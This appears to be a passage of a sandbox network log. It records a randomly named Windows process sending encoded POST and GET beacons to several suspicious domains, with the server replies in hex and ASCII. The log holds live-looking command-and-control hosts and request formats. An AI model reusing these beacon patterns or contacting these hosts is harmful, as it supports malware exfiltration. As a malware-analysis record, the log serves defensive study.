Jan 11, 2025 09:35:30.339411974 CET	554	OUT	GET /0kli/?40G=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&I6=x8CX HTTP/1.1 Host: www.tempatmudisini06.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:35:31.239181042 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Sat, 11 Jan 2025 08:35:31 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49985	188.114.96.3	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:36.445662975 CET	819	OUT	POST /ipd6/ HTTP/1.1 Host: www.questmatch.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.questmatch.pro Referer: http://www.questmatch.pro/ipd6/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 55 5a 64 59 66 43 41 54 57 63 68 7a 4a 58 71 4a 74 37 44 45 64 73 4b 4f 71 78 64 35 34 47 77 5a 55 73 65 56 34 72 42 71 41 52 55 77 62 62 39 33 66 45 6b 77 6e 44 55 59 31 31 31 32 71 58 32 57 42 72 41 57 67 4f 4b 38 6d 4d 39 53 6d 7a 6f 67 78 72 44 49 51 4c 4c 74 74 54 6c 4f 37 50 39 67 30 53 72 64 78 54 57 53 4c 49 31 66 58 54 34 6a 4c 37 59 72 6a 72 52 73 76 69 59 45 6a 55 39 6e 6f 57 75 64 79 64 42 65 42 63 58 65 6f 41 36 76 49 6e 74 75 72 4a 4d 4b 51 38 54 69 52 38 77 58 79 57 61 67 79 76 65 38 68 76 43 58 79 65 39 4c 6a 6e 59 67 48 76 4f 41 32 33 44 45 56 4d 75 42 76 76 63 41 6d 51 3d 3d Data Ascii: 40G=BC3Wr1zDDmuZUZdYfCATWchzJXqJt7DEdsKOqxd54GwZUseV4rBqARUwbb93fEkwnDUY1112qX2WBrAWgOK8mM9SmzogxrDIQLLttTlO7P9g0SrdxTWSLI1fXT4jL7YrjrRsviYEjU9noWudydBeBcXeoA6vInturJMKQ8TiR8wXyWagyve8hvCXye9LjnYgHvOA23DEVMuBvvcAmQ==
Jan 11, 2025 09:35:37.069663048 CET	1236	IN	HTTP/1.1 404 Date: Sat, 11 Jan 2025 08:35:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Correlation-ID: d2a4df9a-1bad-4309-a814-f307a93b05c4 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 CF-Connecting-IP: 8.46.123.189 CF-IPCountry: US cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ya2kFuoxOegzEsX%2ByJrbwRted5Bj0yBlXBMZ1CHaysclX%2FKYG3v9Bum5dSIcfVAnWdbp6LNfASJj0FLh%2F8SaEK4gyF56qsAxJPsE3pduU8Uv7sgJAEk5HSFx8b6SdA0vnwh3Q8Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003930b395841c1-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cd 0e 82 30 10 06 5f a5 f9 ce 10 40 ea 0f 7d 00 13 2f 6a 22 37 e3 61 61 5b 25 d6 ae 29 70 30 84 77 37 84 f3 4c 26 33 a1 11 fe c1 84 d1 fb 04 36 46 89 3d cc 84 56 d8 c2 e8 5c 27 08 f4 b1 30 38 cb a0 8e 32 06 46 02 b6 Data Ascii: b5$0_@}/j"7aa[%)p0w7L&36F=V\'082F
Jan 11, 2025 09:35:37.069684029 CET	104	IN	Data Raw: 03 75 be 87 b9 e3 2c ea 45 81 bd 8d ca 2d 54 39 89 ea 7a b9 d5 2a eb be bc cb f0 98 17 bf 19 9f a7 e0 64 4d c7 68 3d 0d 9d 84 13 c3 80 37 a4 d9 55 94 16 0d 71 aa cb bc 4a e9 50 e8 d4 95 f9 9e aa b2 c9 b7 ad 46 82 7e a0 f6 5d 47 6a ed 7a 3b cf 7f Data Ascii: u,E-T9z*dMh=7UqJPF~]Gjz;(q;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49986	188.114.96.3	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:39.005582094 CET	839	OUT	POST /ipd6/ HTTP/1.1 Host: www.questmatch.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.questmatch.pro Referer: http://www.questmatch.pro/ipd6/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 63 5a 61 75 47 56 35 71 42 71 4d 78 55 77 56 37 39 76 43 55 6b 37 6e 45 63 71 31 31 4a 32 71 58 79 57 42 76 45 57 68 2f 4b 39 67 63 39 51 75 54 6f 69 73 37 44 49 51 4c 4c 74 74 54 78 6b 37 50 56 67 30 43 62 64 77 32 36 56 43 6f 31 59 51 54 34 6a 50 37 5a 69 6a 72 52 65 76 6a 46 70 6a 58 56 6e 6f 54 53 64 72 73 42 64 49 63 58 59 73 41 36 36 45 57 51 6e 70 72 45 46 4a 4e 66 57 54 38 73 57 33 67 62 43 6f 4e 53 51 2f 2b 36 73 32 63 5a 39 30 42 46 56 46 75 4b 59 37 56 33 6c 4b 37 4c 72 69 39 39 45 77 70 38 33 72 38 54 4f 72 32 45 4f 76 79 30 49 41 77 4d 55 70 43 77 3d Data Ascii: 40G=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4ycZauGV5qBqMxUwV79vCUk7nEcq11J2qXyWBvEWh/K9gc9QuTois7DIQLLttTxk7PVg0Cbdw26VCo1YQT4jP7ZijrRevjFpjXVnoTSdrsBdIcXYsA66EWQnprEFJNfWT8sW3gbCoNSQ/+6s2cZ90BFVFuKY7V3lK7Lri99Ewp83r8TOr2EOvy0IAwMUpCw=
Jan 11, 2025 09:35:39.640352011 CET	1236	IN	HTTP/1.1 404 Date: Sat, 11 Jan 2025 08:35:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Correlation-ID: 3cebc244-2100-4ba9-b75d-e1395fe5498d X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 CF-Connecting-IP: 8.46.123.189 CF-IPCountry: US cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NRnO2oJZ1AsK7tdGUi0gFh5buQe3Xa69X4olgbC462cs%2FgSeIloHSig38bFHSQN0Dca4Qrnt2qQ98ubOpKnORQ6yCHz4pT7cduNM3Vi%2FYYFVQl%2BrBzL6hIdSU1Ji6rx0%2F%2Bs37Iw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003931b4ab1428b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2141&min_rtt=2141&rtt_var=1070&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=839&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cb 0e 82 30 10 45 7f a5 99 35 0d af a2 d2 0f 30 61 83 26 b2 33 2e fa 98 2a b1 76 4c 29 0b 43 f8 77 43 58 df 93 73 ee 02 9a ec 0f 64 98 bd cf 00 63 a4 38 81 5c c0 90 45 90 a2 10 19 04 f5 41 90 d0 53 62 Data Ascii: b5$0E50a&3.*vL)CwCXsdc8\EASb
Jan 11, 2025 09:35:39.640372992 CET	109	IN	Data Raw: 67 9a 83 85 0c 2c 26 35 fa 09 e4 1d 7a 62 2f 15 ac c7 c8 dc b6 32 47 91 5d 2f b7 81 e5 e3 d7 1e 72 78 ac 1b af e7 67 17 1c ed ea 18 d1 ab 34 52 e8 2c 48 a8 0d 6a 53 09 c1 ab b2 28 b8 d0 aa e5 fa d8 58 8e 65 dd 36 0e 1b d1 9e b6 e6 94 94 79 0f 51 Data Ascii: g,&5zb/2G]/rxg4R,HjS(Xe6yQ5\|0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49987	188.114.96.3	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:41.546978951 CET	1852	OUT	POST /ipd6/ HTTP/1.1 Host: www.questmatch.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.questmatch.pro Referer: http://www.questmatch.pro/ipd6/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 42 43 33 57 72 31 7a 44 44 6d 75 5a 56 35 4e 59 65 68 59 54 65 63 68 79 4b 58 71 4a 30 4c 44 41 64 74 32 4f 71 7a 78 70 34 79 55 5a 61 66 6d 56 37 4a 5a 71 4e 78 55 77 64 62 39 37 43 55 6b 63 6e 46 35 68 31 31 46 6d 71 52 75 57 42 4b 51 57 6d 4e 75 39 70 63 39 51 69 7a 6f 6e 78 72 43 53 51 50 58 68 74 54 68 6b 37 50 56 67 30 45 33 64 77 6a 57 56 4f 49 31 66 58 54 34 2f 4c 37 5a 4b 6a 72 5a 4f 76 6a 42 66 69 6e 31 6e 70 33 4f 64 70 36 39 64 44 63 58 61 72 41 37 2f 45 57 63 6b 70 72 5a 30 4a 4e 71 39 54 39 59 57 30 78 69 31 34 64 65 5a 6f 34 36 56 30 75 45 52 31 69 39 39 63 65 43 4f 39 57 4f 47 42 70 48 78 76 2b 52 4b 6d 66 6c 33 35 38 6a 77 67 55 39 57 6c 79 6c 4e 59 46 6b 6c 31 6b 59 65 79 6b 63 62 31 5a 50 47 6a 6c 74 46 6a 44 59 50 54 32 33 30 77 59 2b 45 34 68 4e 49 57 6a 30 43 47 6d 63 70 56 73 55 56 67 53 57 4d 2f 43 38 79 72 73 47 6e 33 45 37 62 53 2f 6a 56 42 54 55 56 69 55 58 5a 71 54 4b 4a 38 35 6a 4c 61 68 5a 38 6f 68 63 46 6a 6b 78 31 53 6c 4f 37 5a 42 46 31 50 6c 73 2b 6e 69 [TRUNCATED] Data Ascii: 40G=BC3Wr1zDDmuZV5NYehYTechyKXqJ0LDAdt2Oqzxp4yUZafmV7JZqNxUwdb97CUkcnF5h11FmqRuWBKQWmNu9pc9QizonxrCSQPXhtThk7PVg0E3dwjWVOI1fXT4/L7ZKjrZOvjBfin1np3Odp69dDcXarA7/EWckprZ0JNq9T9YW0xi14deZo46V0uER1i99ceCO9WOGBpHxv+RKmfl358jwgU9WlylNYFkl1kYeykcb1ZPGjltFjDYPT230wY+E4hNIWj0CGmcpVsUVgSWM/C8yrsGn3E7bS/jVBTUViUXZqTKJ85jLahZ8ohcFjkx1SlO7ZBF1Pls+ni/2uhWlHyQM+eHglFX1zp62GCK3s3p1xXJDTrTBn2/zIzAeUdklbTxcc7nOKoRF3l59Mh0KaCes8UEiXnCSdf9Y8yVX6iee3Fvy9rAAIkJy/948XhAB5gRoZP8ERMYn62qrgJA1hdMR+8Lwu42qgbcWaWTxjGd2Z5m7qYJzriROZ/t2Fgdrr36cxtlSlpozBkBWIQHI7CawRopve5FccNkJAu3M2B+GF00li6XVcC7UvBYh+nhNQ6HKSCB6V3Zl2pO+IGwX9cpXWMrA5ulhJ1/N26gwhbvIl3EGYfvvRODAv9sF2p9vPQfBBt0K3aMMxnSQb380uZvNveRgHQ94M+Vfw8854L8B66VKY7HnFWYW3tUexet7s2zCscWd5dIdPGL1OQj6B/OdVtydS2MUF950Qc2iNGURxwqGYi34KRXOb4iqAJfzkrxREsQxHN9M5oY3a9lu8WQ8tzrJ0DIWtEv8Rdv60SOtb0cGzEY9gnfe9cxh8aHF/51wMW42p3Boq2uh8BpCKew3S/CuJBjeylZubrsf2JJXMCVf9uMJ/CdrgC8bRDOhkGLN3BgFQ5S1GIX7QXVIeSADgl90tTRc6M4aWKPzoiHxPAWsdwnwfgy3ix4OdH7TX7iGOXQsdNzgtICP7wM3OsgnO1yfoO9H9/SYf4O12gwF0hfX [TRUNCATED]
Jan 11, 2025 09:35:42.182499886 CET	1236	IN	HTTP/1.1 404 Date: Sat, 11 Jan 2025 08:35:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Correlation-ID: 9c563be1-5cd2-49e2-879a-fbb16eea01dd X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 CF-Connecting-IP: 8.46.123.189 CF-IPCountry: US cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYO1aFymMxhk%2BEJm5fsTb6m0qzhVpIEpGiNzDpKiPTC%2FELk6VMrnvoJkQBqhnplsUJ0CoZtPCFgllTBvrtGp4VqZ%2BM%2BvpWEsag%2FoJAsYKe%2Byaj%2Frzp0sjhV5lY%2FWqZGxh8vU7DI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003932b2b7d8cc8-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1939&rtt_var=969&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1852&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cb 0e 82 30 10 45 7f a5 99 35 0d 0f 01 a5 1f 60 c2 06 4d 64 67 5c b4 9d 41 89 b5 63 4a 59 18 c2 bf 1b c2 fa 9e 9c 73 17 30 8c 3f 50 7e 76 2e 01 0a 81 c3 04 6a 01 cb 48 a0 ca ac 4c c0 Data Ascii: b5$0E5`Mdg\AcJYs0?P~v.jHL
Jan 11, 2025 09:35:42.182517052 CET	115	IN	Data Raw: eb 0f 81 82 8e a3 38 f3 ec 11 12 40 8a 7a 74 13 a8 3b 74 2c 5e da a3 a3 20 86 6d 15 03 07 71 bd dc 7a 91 8e 5f ac 53 78 ac 1b 6f e6 67 eb 07 de d5 21 90 d3 71 64 df 22 28 68 6c 55 1f 0c e5 b2 b2 58 c8 b2 a1 42 9e 8e 8d 96 83 31 79 4d a4 b3 1c b7 Data Ascii: 8@zt;t,^ mqz_Sxog!qd"(hlUXB1yM}A[:G0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49988	188.114.96.3	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:44.088224888 CET	546	OUT	GET /ipd6/?40G=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&I6=x8CX HTTP/1.1 Host: www.questmatch.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:35:44.732923985 CET	1236	IN	HTTP/1.1 404 Date: Sat, 11 Jan 2025 08:35:44 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Correlation-ID: 647e1f24-0759-486e-be70-098d52a26960 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: 0 CF-Connecting-IP: 8.46.123.189 CF-IPCountry: US cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EsSpJw3PGRTy2FIfWaDGWM20ka5m8tEbccDofgh83GaY%2FGLNqZnovtXkKu6rqLmzSYKnN6xtmWd0d44GXzitLCkNrqWW8Legt6M0t8fHTOfhCzUrJ6240aI8o6tuP%2BK%2BwJxnKW8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003933b1a914262-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2264&min_rtt=2264&rtt_var=1132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 69 70 64 36 2f 22 5d 7d 2c 22 64 65 62 75 67 49 Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /ipd6/"]},"debugI
Jan 11, 2025 09:35:44.732943058 CET	87	IN	Data Raw: 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 36 34 37 65 31 66 32 34 2d 30 37 35 39 2d 34 38 36 65 2d 62 65 37 30 2d 30 39 38 64 35 32 61 32 36 39 36 30 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d 0a Data Ascii: nfo":{"correlationId":"647e1f24-0759-486e-be70-098d52a26960","stackTrace":null}}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49989	66.29.137.10	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:49.783668995 CET	813	OUT	POST /hayl/ HTTP/1.1 Host: www.callyur.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.callyur.shop Referer: http://www.callyur.shop/hayl/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 36 52 37 6b 47 31 66 57 53 38 58 53 68 31 6b 61 78 44 68 56 65 78 72 54 57 47 49 52 4f 56 78 73 61 42 72 6b 4d 79 4b 53 37 43 43 4d 49 2f 31 71 54 42 4c 35 30 42 4e 6d 65 2f 33 6c 30 56 48 78 57 49 70 2f 56 45 75 66 44 42 73 37 35 61 69 38 72 4f 58 41 71 43 49 67 61 42 77 31 65 43 76 32 79 39 41 34 31 56 66 78 30 36 51 77 69 41 62 70 78 7a 48 45 62 6a 36 75 4f 55 70 47 63 71 6a 72 55 6b 2f 67 59 69 73 7a 6a 64 38 44 35 63 59 58 36 75 64 65 64 59 35 63 52 73 77 38 59 63 6a 54 4f 77 35 4c 66 68 31 57 37 38 73 6c 36 51 66 43 74 31 57 4f 5a 59 53 35 62 44 63 78 48 76 38 2f 6d 57 48 68 51 3d 3d Data Ascii: 40G=2soVY/BCKwRxo6R7kG1fWS8XSh1kaxDhVexrTWGIROVxsaBrkMyKS7CCMI/1qTBL50BNme/3l0VHxWIp/VEufDBs75ai8rOXAqCIgaBw1eCv2y9A41Vfx06QwiAbpxzHEbj6uOUpGcqjrUk/gYiszjd8D5cYX6udedY5cRsw8YcjTOw5Lfh1W78sl6QfCt1WOZYS5bDcxHv8/mWHhQ==
Jan 11, 2025 09:35:50.542251110 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 08:35:50 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED] Data Ascii: 1356ZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~\|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? Gyg&Se^}UZ>Rx#?_\|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj\|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I@W KYxSz125?V{:3>"m?Q
Jan 11, 2025 09:35:50.542273045 CET	1236	IN	Data Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi\|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
